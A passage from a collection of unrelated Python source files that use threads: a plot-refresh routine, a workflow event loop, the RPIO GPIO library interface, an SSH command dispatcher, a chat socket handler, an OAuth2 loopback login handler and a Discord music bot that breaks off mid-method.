loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
mainloop.py
|
import asyncio
from asyncio import events
from flask import Flask
from importlib import import_module
import json
from logging import basicConfig, INFO, info, DEBUG, debug
from os import listdir
import strictyaml
from sys import platform
from time import sleep
from threading import Thread
from queue import SimpleQueue
import core
basicConfig(level=INFO, format='%(levelname)-8s %(message)s')
config_path = "data/config.json"
workflows_path = "data/workflows"
triggers_path = "data/triggers"
debug(platform)
with open(config_path) as json_data_file:
core.config = json.load(json_data_file)
if platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
core.event_queue = SimpleQueue()
info("loading plugins")
import_module("plugins.basic")
import_module("plugins.cricbuzz")
import_module("plugins.xmppservice")
info("plugins loaded")
def remove_ext(filename):
return filename[:-4]
info("loading workflows")
for filename in listdir(workflows_path):
if filename.endswith(".yml"):
file_path = f"{workflows_path}/{filename}"
with open(file_path, 'r') as f:
wf = strictyaml.load(f.read()).data
name = remove_ext(filename)
core.add_workflow(name, wf)
info("workflows loaded")
info("loading triggers")
for filename in listdir(triggers_path):
if filename.endswith(".yml"):
file_path = f"{triggers_path}/{filename}"
with open(file_path, 'r') as f:
tr = strictyaml.load(f.read()).data
core.add_trigger(tr)
info("triggers loaded")
info("available actions")
info(core.actions.keys())
info("available eventfilters")
info(core.triggerfliters.keys())
info("available services")
info(core.services.keys())
info("available workflows")
info(core.workflows.keys())
#info("available triggers")
#info(core.triggers)
def process_event(e):
filtered_triggers = filter(lambda c: c["trigger"] == e[0], core.triggers)
for trigger in filtered_triggers:
if core.triggerfliters[e[0]](e[1], trigger["params"]):
core.start_workflow(trigger['workflow'], trigger["params"])
info(trigger['workflow'] + "started")
info("(" + e[0] + "," +e[1] + ") processed ")
while True:
try:
while not core.event_queue.empty():
e = core.event_queue.get()
debug(e)
t = Thread(target=process_event,args=(e,))
t.start()
except KeyboardInterrupt:
break
sleep(1)
# app = Flask("pibot")
# @app.route('/')
# def index():
# return "pibot"
# app.run(port=8080)
|
__init__.py
|
# -*- coding: utf-8 -*-
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
"""
RPIO extends RPi.GPIO with GPIO interrupts, TCP socket interrupts and more.
Example of how to listen for interrupts with RPIO:
import RPIO
def gpio_callback(gpio_id, val):
print("gpio %s: %s" % (gpio_id, val))
def socket_callback(socket, val):
print("socket %s: '%s'" % (socket.fileno(), val))
socket.send("echo: %s" % val)
# Three GPIO interrupt callbacks
RPIO.add_interrupt_callback(7, gpio_callback)
RPIO.add_interrupt_callback(9, gpio_callback, pull_up_down=RPIO.PUD_UP)
# One TCP socket server callback on port 8080
RPIO.add_tcp_callback(8080, socket_callback)
# Start the blocking epoll loop (exit with Ctrl+C)
RPIO.wait_for_interrupts()
You can add the argument `threaded=True` to `wait_for_interrupts(..)` in order
to run it in a thread. RPIO will automatically shutdown everything nicely when
your script exits.
GPIO interrupts can have optional `edge` and `pull_up_down` parameters (default
edge is `both` and default pull_up_down is `RPIO.PUD_OFF`).
If you want to receive a callback inside a Thread (which won't block anything
else on the system), set `threaded_callback` to True when adding an interrupt-
callback. Here is an example:
RPIO.add_interrupt_callback(7, do_something, threaded_callback=True)
RPIO.add_tcp_callback(8080, socket_callback, threaded_callback=True))
To debounce GPIO interrupts, you can add the argument ``debounce_timeout_ms``
to the ``add_interrupt_callback(..)`` call:
RPIO.add_interrupt_callback(7, do_something, debounce_timeout_ms=100)
To stop the `wait_for_interrupts()` loop, call
`RPIO.stop_waiting_for_interrupts()`. To remove all callbacks from a certain
gpio pin, use `RPIO.del_interrupt_callback(gpio_id)`.
Besides the interrupt handling, you can use RPIO just as RPi.GPIO:
import RPIO
# set up input channel without pull-up
RPIO.setup(7, RPIO.IN)
# set up input channel with pull-up control. Can be
# PUD_UP, PUD_DOWN or PUD_OFF (default)
RPIO.setup(7, RPIO.IN, pull_up_down=RPIO.PUD_UP)
# read input from gpio 7
input_value = RPIO.input(7)
# set up GPIO output channel
RPIO.setup(8, RPIO.OUT)
# set gpio 8 to high
RPIO.output(8, True)
# set up output channel with an initial state
RPIO.setup(8, RPIO.OUT, initial=RPIO.LOW)
# change to BOARD numbering schema
RPIO.setmode(RPIO.BOARD)
# set software pullup on channel 17
RPIO.set_pullupdn(17, RPIO.PUD_UP)
# reset every channel that has been set up by this program,
# and unexport interrupt gpio interfaces
RPIO.cleanup()
You can use RPIO as a drop-in replacement for RPi.GPIO in your existing code:
import RPIO as GPIO # (if you've used `import RPi.GPIO as GPIO`)
Author: Chris Hager <chris@linuxuser.at>
URL: https://github.com/metachris/RPIO
License: LGPLv3+
"""
from threading import Thread
import RPIO._GPIO as _GPIO
from RPIO._RPIO import Interruptor
VERSION = "0.10.1"
# Exposing constants from RPi.GPIO
VERSION_GPIO = _GPIO.VERSION_GPIO
RPI_REVISION = _GPIO.RPI_REVISION
RPI_REVISION_HEX = _GPIO.RPI_REVISION_HEX
HIGH = _GPIO.HIGH
LOW = _GPIO.LOW
OUT = _GPIO.OUT
IN = _GPIO.IN
ALT0 = _GPIO.ALT0
BOARD = _GPIO.BOARD
BCM = _GPIO.BCM
PUD_OFF = _GPIO.PUD_OFF
PUD_UP = _GPIO.PUD_UP
PUD_DOWN = _GPIO.PUD_DOWN
# Exposing methods from RPi.GPIO
setup = _GPIO.setup
output = _GPIO.output
input = _GPIO.input
setmode = _GPIO.setmode
forceoutput = _GPIO.forceoutput
forceinput = _GPIO.forceinput
set_pullupdn = _GPIO.set_pullupdn
gpio_function = _GPIO.gpio_function
channel_to_gpio = _GPIO.channel_to_gpio
# BCM numbering mode by default
_GPIO.setmode(BCM)
MODEL_DATA = {
'2': ('B', '1.0', 256, '?'),
'3': ('B', '1.0', 256, '?'),
'4': ('B', '2.0', 256, 'Sony'),
'5': ('B', '2.0', 256, 'Qisda'),
'6': ('B', '2.0', 256, 'Egoman'),
'7': ('A', '2.0', 256, 'Egoman'),
'8': ('A', '2.0', 256, 'Sony'),
'9': ('A', '2.0', 256, 'Qisda'),
'd': ('B', '2.0', 512, 'Egoman'),
'e': ('B', '2.0', 512, 'Sony'),
'f': ('B', '2.0', 512, 'Qisda')
}
# List of valid bcm gpio ids for raspberry rev1 and rev2. Used for inspect-all.
GPIO_LIST_R1 = (0, 1, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 21, 22, 23, 24, 25)
GPIO_LIST_R2 = (2, 3, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 22, 23, 24, 25, \
27, 28, 29, 30, 31)
# List of board pins with extra information which board header they belong to.
# Revision 2 boards have extra gpios on the P5 header (gpio 27-31)). Shifting
# the header info left by 8 bits leaves 255 possible channels per header. This
# list of board pins is currently only used for testing purposes.
HEADER_P5 = 5 << 8
PIN_LIST = (3, 5, 7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, \
3 | HEADER_P5, 4 | HEADER_P5, 5 | HEADER_P5, 6 | HEADER_P5)
# _rpio is the interrupt handling wrapper object
_rpio = Interruptor()
def sysinfo():
""" Returns (model, revision, mb-ram, maker) for this raspberry """
return (RPI_REVISION_HEX,) + MODEL_DATA[RPI_REVISION_HEX.lstrip("0")]
def version():
""" Returns a tuple of (VERSION, VERSION_GPIO) """
return (VERSION, VERSION_GPIO)
def add_tcp_callback(port, callback, threaded_callback=False):
"""
Adds a unix socket server callback, which will be invoked when values
arrive from a connected socket client. The callback must accept two
parameters, eg. ``def callback(socket, msg)``.
"""
_rpio.add_tcp_callback(port, callback, threaded_callback)
def add_interrupt_callback(gpio_id, callback, edge='both', \
pull_up_down=PUD_OFF, threaded_callback=False, \
debounce_timeout_ms=None):
"""
Add a callback to be executed when the value on 'gpio_id' changes to
the edge specified via the 'edge' parameter (default='both').
`pull_up_down` can be set to `RPIO.PUD_UP`, `RPIO.PUD_DOWN`, and
`RPIO.PUD_OFF`.
If `threaded_callback` is True, the callback will be started
inside a Thread.
If debounce_timeout_ms is set, new interrupts will not be forwarded
until after the specified amount of milliseconds.
"""
_rpio.add_interrupt_callback(gpio_id, callback, edge, pull_up_down, \
threaded_callback, debounce_timeout_ms)
def del_interrupt_callback(gpio_id):
""" Delete all interrupt callbacks from a certain gpio """
_rpio.del_interrupt_callback(gpio_id)
def close_tcp_client(fileno):
""" Closes TCP connection to a client and removes client from epoll """
_rpio.close_tcp_client(fileno)
def wait_for_interrupts(threaded=False, epoll_timeout=1):
"""
Blocking loop to listen for GPIO interrupts and distribute them to
associated callbacks. epoll_timeout is an easy way to shutdown the
blocking function. Per default the timeout is set to 1 second; if
`_is_waiting_for_interrupts` is set to False the loop will exit.
If an exception occurs while waiting for interrupts, the interrupt
gpio interfaces will be cleaned up (/sys/class/gpio unexports). In
this case all interrupts will be reset and you'd need to add the
callbacks again before using `wait_for_interrupts(..)` again.
If the argument `threaded` is True, wait_for_interrupts will be
started in a daemon Thread. To quit it, call
`RPIO.stop_waiting_for_interrupts()`.
"""
if threaded:
t = Thread(target=_rpio.wait_for_interrupts, args=(epoll_timeout,))
t.daemon = True
t.start()
else:
_rpio.wait_for_interrupts(epoll_timeout)
def stop_waiting_for_interrupts():
"""
Ends the blocking `wait_for_interrupts()` loop the next time it can,
which depends on the `epoll_timeout` (per default its 1 second).
"""
_rpio.stop_waiting_for_interrupts()
def cleanup_interrupts():
"""
Removes all callbacks and closes used GPIO interfaces and sockets. After
this you'll need to re-add the interrupt callbacks before waiting for
interrupts again. Since RPIO v0.10.1 this is done automatically on exit.
"""
_rpio.cleanup_interrupts()
def cleanup():
"""
Clean up by resetting all GPIO channels that have been used by this
program to INPUT with no pullup/pulldown and no event detection. Also
unexports the interrupt interfaces and callback bindings. You'll need
to add the interrupt callbacks again before waiting for interrupts again.
"""
cleanup_interrupts()
_GPIO.cleanup()
def setwarnings(enabled=True):
""" Show warnings (either `True` or `False`) """
_GPIO.setwarnings(enabled)
_rpio._show_warnings = enabled
|
threaded_dispatch.py
|
#!/usr/bin/env python
import subprocess
import configparser
from threading import Thread
from queue import Queue
import time
"""
A threaded ssh based command dispatch system
"""
start = time.time()
queue = Queue()
def readConfig(file="config.ini"):
"""Extract IP addresses and CMDS from config file and returns tuple"""
ips = []
cmds = []
Config = configparser.ConfigParser()
Config.read(file)
machines = Config.items("MACHINES")
commands = Config.items("COMMANDS")
for ip in machines:
ips.append(ip[1])
for cmd in commands:
cmds.append(cmd[1])
return ips, cmds
def launcher(i,q, cmd):
"""Spawns command in a thread to an ip"""
while True:
#grabs ip, cmd from queue
ip = q.get()
print("Thread %s: Running %s to %s" % (i, cmd, ip))
subprocess.call("ssh root@%s %s" % (ip, cmd), shell=True)
q.task_done()
#grab ips and cmds from config
ips, cmds = readConfig()
#Determine Number of threads to use, but max out at 25
if len(ips) < 25:
num_threads = len(ips)
else:
num_threads = 25
#Start thread pool
for i in range(num_threads):
for cmd in cmds:
worker = Thread(target=launcher, args=(i, queue,cmd))
worker.setDaemon(True)
worker.start()
print("Main Thread Waiting")
for ip in ips:
queue.put(ip)
queue.join()
end = time.time()
print("Dispatch Completed in %s seconds" % float(end - start))
|
client.py
|
import socket
from threading import Thread
from queue import *
from message import *
class Client:
def __init__(self, username, socket, address):
self.address = address
self.username = username
self.socket = socket
self.awaiting_messages = Queue()
self.running = True
def start(self, users):
self.running = True
self.thread = Thread(target = self.receive, args=(users,))
self.thread.start()
def receive(self, users):
while self.running:
try:
data = self.socket.recv(4096).decode()
msg = fromStr(data)
if "SERVER" in msg.recipients and msg.data == "QUIT":
print("[INFO]: Client", msg.sender,"disconnected")
self.running = False
break
print("Received a new message from ", msg.sender, "to", msg.recipients, ": (", msg.time, ")", msg.data)
# If no recipient specified, send to all
if msg.recipients == set(['']):
for key in users:
if key != self.username.upper():
users[key].awaiting_messages.put(msg)
# Handle messages for server exclusively
elif msg.recipients == set(['SERVER']):
if(msg.data == "LIST"):
print("[INFO]:", msg.sender, "requested the list of user")
answer = ">>"
for i in users.values():
answer += "->" + i.username
self.awaiting_messages.put(Message("SERVER",[self.username], answer))
# Handle messages with specific recipient
else:
for recip in msg.recipients:
if recip.upper() in users:
users[recip.upper()].awaiting_messages.put(msg)
except Exception as e:
print(e)
print("Connection to", self.username, "has been lost")
self.running = False
break
def sendAwaiting(self):
if not self.awaiting_messages.empty():
self.socket.send(self.awaiting_messages.get().serialize().encode())
#print("[INFO]: Message transmitted to", self.username)
|
oauth_handler.py
|
#
# Copyright 2019 EPAM Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
OAuth2 handler
"""
import base64
import socket
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from contextlib import closing
from urllib.parse import parse_qs, urlparse
import typing
import json
import requests
from odahuflow.sdk import config
from odahuflow.sdk.utils import render_template
LOGGER = logging.getLogger()
SA_SCOPE = 'openid profile offline_access groups'
class OAuthLoginResult(typing.NamedTuple):
"""
Result of oauth login process
"""
access_token: str
refresh_token: str
id_token: str
issuing_url: str
user_email: str
user_name: str
def find_free_port(bind_addr: str = '0.0.0.0') -> int:
"""
Find next available port on local machine
:return: int - port number
"""
# pylint: disable=E1101
# due to bug with closing return type
LOGGER.debug('Trying to get free port')
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind((bind_addr, 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
LOGGER.debug('Free port %d has been found', port)
return port
def _try_to_extract_issuing_url_from_well_known_metadata(well_known_address: str) -> typing.Optional[str]:
"""
Try to extract token issuing url from well-known location
:param well_known_address: well-known URL
:type well_known_address: str
:return: str or None -- token issuing URL
"""
try:
LOGGER.debug('Trying to extract well-known information from address %r', well_known_address)
response = requests.get(url=well_known_address)
data = response.json()
except requests.HTTPError as http_error:
LOGGER.debug('Failed to extract well-known information from address %r - %s', well_known_address, http_error)
return None
except ValueError as value_error:
LOGGER.debug('Failed to parse well-known information from address %r - %s', well_known_address, value_error)
return None
token_endpoint = data.get('token_endpoint')
if not token_endpoint:
LOGGER.debug('well-known information does not contain token_endpoint (%s)', well_known_address)
return
return token_endpoint
def get_oauth_token_issuer_url(redirect_url: str) -> typing.Optional[str]:
"""
Get OAuth2 token issuing URL
:param redirect_url: current redirection URL
:type redirect_url: str
:return: str or None -- token issuing URL
"""
# 1st priority - check config variable ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL
if config.ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL:
return config.ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL
# 2nd priority - try to remove URL parts of redirect URL and append /.well-known/openid-configuration
# According to https://tools.ietf.org/pdf/rfc8414.pdf
loc = urlparse(redirect_url)
path_parts = loc.path.strip('/').split('/')
for i in range(len(path_parts)):
sub_path = '/'.join(path_parts[0:i])
full_uri = f'{loc.scheme}://{loc.netloc}/{sub_path}/.well-known/openid-configuration'
endpoint = _try_to_extract_issuing_url_from_well_known_metadata(full_uri)
if endpoint:
return endpoint
return None
def _ask_token_endpoint(url: str, payload: typing.Any) -> typing.Optional[OAuthLoginResult]:
"""
Query token endpoint to refresh / issue new token
:param url: token endpoint
:param payload: query payload
:return: OAuthLoginResult or None -- login result or None
"""
try:
res = requests.post(url, data=payload)
data = res.json()
except (ValueError, requests.HTTPError) as error:
LOGGER.warning('Failed to get ID token on %r - %s', url, error)
return None
access_token, refresh_token, id_token = data.get('access_token'), data.get('refresh_token'), data.get('id_token')
if not access_token or not refresh_token or not id_token:
LOGGER.warning('Response does not contain access_token / refresh_token / id_token')
return None
_, body, _ = id_token.split('.')
id_payload = json.loads(base64.b64decode(body + '===').decode('utf-8'))
user_name = id_payload.get('name')
user_email = id_payload.get('email')
result = OAuthLoginResult(
access_token=access_token,
refresh_token=refresh_token,
id_token=id_token,
issuing_url=url,
user_name=user_name,
user_email=user_email
)
LOGGER.debug('Token information for %s / %s has been received', result.user_name, result.user_email)
return result
def do_refresh_token(refresh_token: str, issue_token_url: str) -> typing.Optional[OAuthLoginResult]:
"""
Refresh token using previously saved refresh_token
:param refresh_token: refresh token
:param issue_token_url: issue token URL
:return: OAuthLoginResult or None -- refresh result or None
"""
LOGGER.debug('Trying to refresh ID token using %s', issue_token_url)
payload = {
'grant_type': 'refresh_token',
'client_id': config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
'client_secret': config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET,
'refresh_token': refresh_token
}
return _ask_token_endpoint(issue_token_url, payload)
def do_client_cred_authentication(
client_id: str = config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
client_secret: str = config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET,
issue_token_url: str = config.API_ISSUING_URL
):
"""
Get access and id token using oauth2 client credentials flow
:param client_id:
:param client_secret:
:param issue_token_url:
:return:
"""
LOGGER.debug('Trying to get ID token via Client Credentials Flow using %s', issue_token_url)
payload = {
'grant_type': 'client_credentials',
'client_id': client_id,
'client_secret': client_secret,
'scope': SA_SCOPE
}
return _ask_token_endpoint(issue_token_url, payload)
def get_id_token(code: str, issue_token_url: str, redirect_uri: str) -> typing.Optional[OAuthLoginResult]:
"""
Get ID token and validate received data
:param code: code
:param issue_token_url: issuing URL
:param redirect_uri: redirect URL
:return: OAuthLoginResult or None -- login result or None
"""
LOGGER.debug('Trying to get ID token and validate using %s', issue_token_url)
payload = {
'grant_type': 'authorization_code',
'client_id': config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
'code': code,
'redirect_uri': redirect_uri
}
if config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET:
payload['client_secret'] = config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET
return _ask_token_endpoint(issue_token_url, payload)
class OAuth2Handler(BaseHTTPRequestHandler):
"""
Handler for simple loopback listening server that handles OAuth2 redirects to loopback host
"""
def __init__(self, *args, on_token_received=None, state=None, target_url=None, redirect_url=None, **kwargs):
"""
Initialize loopback server
:param args: system args
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:param redirect_url: redirect URL to continue authorization
:param kwargs: system args
"""
self.on_token_received = on_token_received
self.state = state
self.target_url = target_url
self.redirect_url = redirect_url
BaseHTTPRequestHandler.__init__(self, *args)
def log_message(self, format: str, *args: typing.Tuple[typing.Any, ...]) -> None: # pylint: disable=W0622
"""
Log an arbitrary message.
The first argument, FORMAT, is a format string for the
message to be logged. If the format string contains
any % escapes requiring parameters, they should be
specified as subsequent arguments (it's just like
printf!).
:param format: format
:param args: arguments for format
:return: None
"""
LOGGER.debug('%s - %s', self.address_string(), format % args)
def raise_error(self, message: str) -> None:
"""
Raise error if it is a problem
:param message: error description
:type message: str
:return: None
"""
self.send_response(500)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(message.encode('utf-8'))
def do_GET(self) -> None:
"""
Handle GET action
:return: None
"""
loc = urlparse(self.path)
if loc.path == config.ODAHUFLOWCTL_OAUTH_LOOPBACK_URL:
params = parse_qs(loc.query)
if 'state' not in params or len(params['state']) != 1:
return self.raise_error('state is missed')
if 'code' not in params or len(params['code']) != 1:
return self.raise_error('code is missed')
state = params['state'][0]
code = params['code'][0]
if state != self.state:
return self.raise_error(f'Wrong state. Received {state!r}, expected {self.state!r}')
issue_token_url = get_oauth_token_issuer_url(self.target_url)
if not issue_token_url:
return self.raise_error(f'Can not get URL for issuing long-life token from {self.target_url}')
login_result = get_id_token(code, issue_token_url, self.redirect_url)
if not login_result:
return self.raise_error(f'Failed to get long-life token from {issue_token_url}')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = render_template('callback-response.html', {})
self.wfile.write(content.encode('utf-8'))
self.on_token_received(login_result)
else:
self.send_response(404)
self.end_headers()
def handler_builder(on_token_received: typing.Callable[[OAuthLoginResult], None],
state: str, target_url: str, redirect_url: str) -> typing.Callable:
"""
Create handler builder for OAuth2 callback built-in server
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:param redirect_url: redirect URL to continue authorization
:return: callable - handler builder function
"""
def init(*args, **kwargs) -> object:
"""
Builder (builds OAuth2Handler instance)
:param args: system args
:param kwargs: system args
:return: object -- handler
"""
OAuth2Handler(*args,
on_token_received=on_token_received,
state=state,
target_url=target_url,
redirect_url=redirect_url,
**kwargs)
return init
def start_oauth2_callback_handler(on_token_received: typing.Callable[[OAuthLoginResult], None],
state: str, target_url: str) -> str:
"""
Start OAuth2 callback handler
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:return: str -- redirect URL to continue authorization
"""
host = config.ODAHUFLOWCTL_OAUTH_LOOPBACK_HOST
port = find_free_port(host)
redirect_url = f'http://{config.ODAHUFLOWCTL_OAUTH_LOOPBACK_HOST}:{port}{config.ODAHUFLOWCTL_OAUTH_LOOPBACK_URL}'
server = HTTPServer((host, port),
handler_builder(on_token_received, state, target_url, redirect_url))
callback_handler = Thread(name='oauth2_callback_handler',
target=server.serve_forever)
callback_handler.start()
return redirect_url
|
main.py
|
# coding=utf-8
import asyncio
import datetime
import html
import os
import re
import threading
import time
import discord
import requests
from .configparser import ConfigParser
from .nsen import Nsen
from .utils import getCustomLogger
class Bot:
def __init__(self):
self.running = False
if not discord.opus.is_loaded():
discord.opus.load_opus("opus")
self.config = ConfigParser().config
self.isDebugMode = self.config.get("debug", False)
self.logger = getCustomLogger("{}/{}.log".format(self.config["logDir"], datetime.datetime.now().strftime("%Y%m%d_%H%M%S")), self.isDebugMode)
self.client = discord.Client()
self.voiceClient = None
self.player = None
self._playing = True
self._volume = self.config["bot"]["volume"]
self.nsenChannel = self.config["niconico"]["default"]
self.voiceChannel = discord.Object(id=self.config["bot"]["channel"])
self.textChannel = discord.Object(id=self.config["bot"]["textChannel"])
self.prefix = self.config["bot"]["prefix"]
self.nsenThread = threading.Thread(name="Sync Nsen Song", target=self.syncNsen)
self.nsenThread.setDaemon(True)
self.musicQueue = []
self.currentVote = []
self.needVotes = self.config["bot"]["needVotes"]
self.currentVideoPath = None
self.nsen = Nsen()
self.nsen.login(self.config["niconico"]["email"], self.config["niconico"]["password"])
self.nsen.setChannel(self.nsenChannel)
self.nsenIcon = "{}/nsen.png".format(self.config["tmpDir"])
self.tmpDir = self.config["tmpDir"]
self.cleanUpInterval = self.config["bot"]["cleanUpInterval"]
self.cleanUpThread = threading.Thread(name="Cleaning Up Tmp Dir", target=self.cleanUpTmpDir)
self.reloginThread = threading.Thread(name="Re-Logging In Dir", target=self.loginNsen)
@self.client.event
async def on_ready():
self.logger.info("Logged in as: {0} (ID: {0.id})".format(self.client.user))
if "nsen" not in [x.name for x in self.client.get_all_emojis()]:
await self.client.create_custom_emoji(self.client.servers[0], "nsen", open(self.nsenIcon, "rb").read())
self.voiceClient = await self.client.join_voice_channel(self.voiceChannel)
await self.loopTrack()
@self.client.event
async def on_voice_state_update(before, after):
if before.voice.voice_channel == after.voice.voice_channel:
return
if self.voiceChannel == after.voice.voice_channel:
await self.client.send_message(self.textChannel, "{}さん `Nsen`チャンネルへようこそ\n`/help`コマンドでヘルプを表示できます。".format(after.mention))
if len(after.voice.voice_channel.voice_members) == 1:
self.playing = True
elif self.voiceChannel == before.voice.voice_channel:
self.playing = False
@self.client.event
async def on_message(message):
if message.author == self.client.user:
return
def getRegex(command, content):
m = re.match("^.{} (.+)$".format(command), content)
return m.group(1) if m else None
if message.content.startswith(self.prefix + "channel"):
result = getRegex("channel", message.content)
if result:
if result not in [x["name"] for x in self.nsen.channelNames] + [y for x in self.nsen.channelNames for y in x["alias"]]:
await self.client.send_message(self.textChannel, "{} 与えられたチャンネル **{}** は不正です。詳しくは`help`コマンドをご利用ください。".format(message.author.mention, result))
return True
if result in [y for x in self.nsen.channelNames for y in x["alias"]]:
result = [x["name"] for x in self.nsen.channelNames if result in x["alias"]][0]
self.nsenChannel = result
self.musicQueue = []
self.nsen.setChannel(self.nsenChannel)
self.player.stop()
await self.client.send_message(self.textChannel, "{} 再生キューを初期化し、チャンネルを **{}** に変更します。".format(message.author.mention, [x["title"] for x in self.nsen.channelNames if x["name"] == self.nsenChannel][0]))
return True
elif message.content.startswith(self.prefix + "queue"):
if self.musicQueue:
await self.client.send_message(self.textChannel, "{} 現在の再生キューです。\n\n{}".format(message.author.mention, "\n".join(["{}. {}".format(i + 1, t["title"]) for i, t in enumerate(self.musicQueue)])))
else:
await self.client.send_message(self.textChannel, "{} 現在の再生キューは空です。".format(message.author.mention))
return True
elif message.content.startswith(self.prefix + "skip"):
if self.musicQueue:
if message.author.id in self.currentVote:
await self.client.send_message(self.textChannel, "{} すでにスキップ投票をしているため、もう投票できません。".format(message.author.mention))
else:
self.currentVote.append(message.author.id)
if len(self.currentVote) >= self.needVotes:
self.player.stop()
await self.client.send_message(self.textChannel, "{} {}票の投票が得られたため、現在の曲をスキップします。".format(message.author.mention, self.needVotes))
else:
await self.client.send_message(self.textChannel, "{} スキップ投票を受け付けました。".format(message.author.mention, self.needVotes))
else:
await self.client.send_message(self.textChannel, "{} 現在の再生キューは空であるため、スキップできません。".format(message.author.mention))
return True
elif message.content.startswith(self.prefix + "volume"):
result = getRegex("volume", message.content)
if result and result != 0:
if result.isdigit():
self.volume = round(int(result) / 100, 2)
await self.client.send_message(self.textChannel, "{} 音量を {}% に変更しました。".format(message.author.mention, int(self.volume * 100)))
return True
elif result.startswith("+") or result.startswith("-"):
sign = result[0]
value = int(result[1:]) if result[1:].isdigit() else None
if value:
value = round((1 if sign == "+" else -1) * value / 100, 2)
if self.volume > value:
self.volume += value
await self.client.send_message(self.textChannel, "{} 音量を {}% に変更しました。".format(message.author.mention, int(self.volume * 100)))
return True
await self.client.send_message(self.textChannel, "{} 現在の音量は {}% です。".format(message.author.mention, int(self.volume * 100)))
return True
if message.content.startswith(self.prefix):
helps = [
["channel [str]", "Nsenチャンネルを [str] に変更します。変更可能なチャンネルは {} です。".format(", ".join(["{} ({})".format(x["name"], ", ".join(x["alias"])) for x in self.nsen.channelNames]))],
["queue", "現在の再生キューを返します。"],
["skip", "現在の曲をスキップする投票を始めます。"],
["volume", "現在の音量を返します。"],
["volume [int]", "音量を [int]% に変更します。"],
["volume [+ または -][int]", "音量を [int]% だけ増加または減少させます。"]
]
await self.client.send_message(
self.textChannel,
"{} Nsen Music Botコマンド一覧:\n\n"
"```\n"
"{}"
"\n\n```".format(
message.author.mention,
"\n\n".join(["{0}{1[0]}\n {1[1]}".format(self.prefix, data) for data in helps])
)
)
@property
def volume(self):
return self._volume
@volume.setter
def volume(self, value):
self._volume = value
if self.player:
if self.player.is_playing():
self.player.volume = self._volume
@property
def playing(self):
return self._volume
@playing.setter
def playing(self, value):
self._playing = value
if self.player:
if not value and self.player.is_playing():
self.player.stop()
async def loopTrack(self):
while self.running:
await self.goNextTrack()
async def goNextTrack(self):
while True:
track = await self.getTrack()
try:
if not self.playing:
await asyncio.sleep(10)
continue
await self.client.send_typing(self.textChannel)
self.player = self.voiceClient.create_ffmpeg_player(track["path"], use_avconv=True)
self.player.volume = self.volume
self.player.start()
self.currentVote = []
await self.client.purge_from(self.textChannel, limit=50, check=lambda x: x.author == self.client.user)
await self.client.send_message(self.textChannel, track["text"])
await self.client.change_presence(game=discord.Game(name=track["title"]))
self.logger.info(track["text"])
while True:
await asyncio.sleep(1)
if self.player.is_done():
await self.client.change_presence(game=None)
break
except:
self.logger.exception("Error occured while goNextTrack")
await asyncio.sleep(10)
async def getTrack(self):
while len(self.musicQueue) == 0:
await asyncio.sleep(1)
t = self.musicQueue.pop(0)
self.currentVideoPath = t["path"]
return t
def syncNsen(self):
previousId = None
while True:
try:
data = self.nsen.getPlayerStatus()
self.logger.debug(data)
if "error" in data:
self.nsen.setChannel(self.nsenChannel)
